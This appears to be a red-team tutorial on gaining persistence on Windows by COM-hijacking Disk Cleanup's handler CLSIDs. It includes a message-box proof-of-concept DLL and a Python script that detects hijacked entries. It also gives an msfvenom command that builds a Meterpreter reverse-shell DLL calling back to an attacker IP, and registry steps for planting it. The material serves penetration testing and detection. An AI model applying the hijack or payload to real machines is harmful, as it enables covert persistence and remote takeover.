In an effort to enhance efficiency, Windows computers come with a pre-installed application called Disk Cleanup that helps clear up disk space by eliminating temporary and cache items. First released in Windows 98, this outdated utility is still accessible in the Settings app along with its more sophisticated rivals.
Disk Cleanup, however, can be abused for persistence, a technique frequently used in red team engagements and penetration tests. It relies on COM hijacking to get malicious code to run whenever Disk Cleanup is launched.
COM hijacking exploits the way the Disk Cleanup application, cleanmgr.exe, looks up particular DLLs in the Windows registry by their CLSIDs (Class Identifiers). By registering their own entry for a CLSID that Disk Cleanup uses, attackers can redirect the program to load their own DLL instead of the intended one.
Therefore, while Disk Cleanup remains a functional tool for managing disk space, it’s crucial to be aware of this potential security risk and implement appropriate security measures to mitigate it.
Think of the registry on your computer as a huge closet that contains all of the software instructions. Disk Cleanup uses certain “keys” in this space to locate cache and temporary files that you can erase without risk.
The wrinkle is that an attacker can construct their own “fake keys” to deceive Disk Cleanup into running harmful code rather than the authorized cleanup procedure if they have admin rights (such as a master key to the storage area).
These “fake keys” are registry entries such as:
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\<registry-key-CLSID> (the legitimate list of Disk Cleanup handlers and their CLSIDs)
- HKCU\Software\Classes\CLSID\{arbitrary-CLSID} (the per-user CLSID entry that a hijack registers)
Thankfully, you can list the registered Disk Cleanup handlers and their CLSIDs with the command:
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches" /s
Downloaded Program Files: This category for removing temporary files is linked to the registry key with the unique identifier {8369AB20-56C9-11D0-94E8-00AA0059CE02}.
Downloaded Program Files CLSID
The category we mentioned earlier, “Downloaded Program Files,” is associated with a specific registry key. This key acts like a unique identifier within the Windows registry, similar to a name tag in a filing cabinet. You can inspect this key with the command:
reg query "HKEY_CLASSES_ROOT\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s
The following code can be used as a proof of concept that displays a message box when the Disk Cleanup utility is started.
```cpp
#include "pch.h"      // precompiled header from the Visual Studio DLL project template
#include <windows.h>

// DllMain is called when the DLL is loaded into, or unloaded from, a process.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Runs once, when the host process (here cleanmgr.exe) loads the DLL.
        MessageBoxW(NULL, L"Visit pentestlab.blog", L"pentestlab", MB_OK);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```
Here’s a breakdown of the code’s functionality in simpler terms:
1. Inclusions:
- The code starts by pulling in declarations from other header files, like a chef gathering ingredients from labelled containers. These declarations are needed to call Windows functions.
2. DLL Entry Point:
- Imagine a security guard at a building’s entrance checking IDs. That’s similar to DllMain, a function that acts as a checkpoint for code libraries. It is called whenever the DLL is loaded or unloaded and runs specific tasks accordingly.
3. Triggered Alert:
- When the DLL is loaded into a process (here, Disk Cleanup), it displays a message box, like a pop-up reminder for visitors at the building entrance. In this case the message simply advertises a website, but in a real attack it could carry out malicious actions.
To hijack a specific COM class (identified by its CLSID), attackers create a new entry in the Windows registry under:
- Location: HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CLSID}
- Content: This entry will have a subkey named InprocServer32.
- Target: The InprocServer32 subkey will point to the path of a malicious DLL (Dynamic Link Library) file chosen by the attacker.
Checking for Hijacked CLSIDs:
The command:
reg query "HKCU\Software\Classes\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s
searches the current user's registry hive for the CLSID {8369AB20-56C9-11D0-94E8-00AA0059CE02} associated with the Downloaded Program Files handler. If this key has been created or altered to point to a malicious DLL file, it may indicate an attempt to compromise Disk Cleanup.
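As an added example (not code from the original post), this Python script parses the output of the two reg query commands above and flags any Disk Cleanup handler CLSID from VolumeCaches that also has a per-user InprocServer32 entry under HKCU. The sample registry output, the all-zero CLSID and the DLL path are constructed for the demonstration.

```python
import re

# Constructed sample `reg query <key> /s` output, not captured from a real host. HKLM
# VolumeCaches lists the legitimate Disk Cleanup handlers and their CLSIDs; the HKCU
# sample is a per-user InprocServer32 entry for one of them. The all-zero CLSID is a placeholder.
HKLM_VOLUME_CACHES = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Downloaded Program Files
    (Default)    REG_SZ    {8369AB20-56C9-11D0-94E8-00AA0059CE02}

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Example Handler
    (Default)    REG_SZ    {00000000-0000-0000-0000-000000000001}
"""
HKCU_CLSID = r"""
HKEY_CURRENT_USER\Software\Classes\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}\InprocServer32
    (Default)    REG_SZ    C:\Users\user\AppData\Local\Temp\pentestlab.dll
"""
CLSID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")

def parse_reg_query(text):
    """Parse `reg query /s` output into {key_path: {value_name: data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = keys.setdefault(line.strip(), {})
        elif line.startswith(" ") and current is not None:
            # Value lines are indented: <name>    <REG_TYPE>    <data>
            parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
            if len(parts) == 3:
                current[parts[0]] = parts[2]
    return keys

def volume_cache_handlers(hklm_text):
    """Map each registered Disk Cleanup handler CLSID to its handler name."""
    handlers = {}
    for key, values in parse_reg_query(hklm_text).items():
        m = CLSID_RE.search(values.get("(Default)", ""))
        if m:
            handlers[m.group(0).upper()] = key.rsplit("\\", 1)[1]
    return handlers

def find_hijacked_handlers(hklm_text, hkcu_text):
    """Flag handler CLSIDs that a per-user InprocServer32 key would redirect: for a
    non-elevated cleanmgr.exe the HKCU Classes hive is consulted before HKLM."""
    handlers, findings = volume_cache_handlers(hklm_text), []
    for key, values in parse_reg_query(hkcu_text).items():
        m = CLSID_RE.search(key)
        if key.upper().endswith("\\INPROCSERVER32") and m and m.group(0).upper() in handlers:
            clsid = m.group(0).upper()
            findings.append((handlers[clsid], clsid, values.get("(Default)", "")))
    return findings
```

Feed the functions the real output of the two reg query commands (for example captured via subprocess) and each returned tuple names the handler, its CLSID and the DLL the per-user entry points to.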
Running Disk Cleanup:
There are several ways to start the Disk Cleanup program (cleanmgr.exe); don’t attempt to run these commands unless instructed by a security professional.
- cleanmgr.exe: launches Disk Cleanup with the graphical user interface.
- cleanmgr.exe /autoclean: runs Disk Cleanup silently without displaying the user interface.
- cleanmgr.exe /setup: (optional) may be used for specific configuration purposes related to Disk Cleanup.
- cleanmgr.exe /cleanup: (optional) may initiate the cleanup process directly without user interaction.
Additional Notes:
- The /autoclean option runs Disk Cleanup silently without a user interface.
- Disk Cleanup could be combined with other system features like scheduled tasks to run automatically at specific times. Do not attempt to implement these functionalities without proper knowledge and guidance.
- Never modify the registry or run unfamiliar commands without proper expertise. Doing so can severely harm your computer.
- If you suspect any suspicious activity on your computer, seek immediate assistance from a security professional.
Persistence Disk Clean-up – MessageBox
Using msfvenom for Demonstration (Caution Advised)
While the Metasploit Framework’s msfvenom utility can generate DLL files automatically, this method is not recommended for real-world red team exercises: directly generated payloads are likely to be detected by security solutions.
Let’s break down the example command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.3 LPORT=4444 -f dll -o pentestlab.dll
- -p windows/x64/meterpreter/reverse_tcp: specifies the payload type (in this case, a Windows 64-bit Meterpreter reverse TCP shell).
- LHOST=10.0.0.3 LPORT=4444: configures the payload to connect back to the attacker’s machine at IP address 10.0.0.3 on port 4444.
- -f dll: sets the output format to a DLL file.
- -o pentestlab.dll: names the output file “pentestlab.dll”.
The DLL must be written to the disk as before, and the registry key must be updated to point to the new path.
Once the disk clean-up process is initiated, the code will be executed and establish a meterpreter session with the compromised host.